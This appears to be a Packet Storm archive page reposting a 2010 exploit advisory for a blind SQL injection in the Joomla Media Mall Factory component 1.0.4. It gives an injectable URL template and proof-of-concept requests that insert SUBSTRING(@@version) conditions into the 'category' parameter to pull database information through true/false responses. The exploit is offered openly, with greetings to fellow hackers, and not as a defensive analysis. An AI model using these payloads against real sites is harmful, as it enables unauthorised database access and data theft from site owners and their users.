what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla Media Mall Factory 1.0.4 Blind SQL Injection

Joomla Media Mall Factory 1.0.4 Blind SQL Injection
Posted Apr 16, 2010
Authored by AntiSecurity

The Joomla Media Mall Factory component version 1.0.4 suffers from a remote blind SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 94d10c7538105f7b68060232b3930c05676c821b0c4989277285c006e781395f

Joomla Media Mall Factory 1.0.4 Blind SQL Injection

Change Mirror Download

===========================================================================================================


[o] Joomla Component Media Mall Factory Blind SQLi Vulnerability

Software : com_mediamall version 1.0.4
Vendor : http://www.thefactory.ro/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/


===========================================================================================================


[o] Exploit

http://localhost/[path]/index.php?option=com_mediamall&category=1[BSQL]


[o] PoC

http://localhost/index.php?option=com_mediamall&category=1+AND+SUBSTRING(@@version,1,1)=5 << true
http://localhost/index.php?option=com_mediamall&category=1+AND+SUBSTRING(@@version,1,1)=4 << false


===========================================================================================================


[o] Greetz

Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews wishnusakti
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11


===========================================================================================================


[o] April 14 2010 - GMT +07:00 Jakarta, Indonesia
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    0 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    0 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close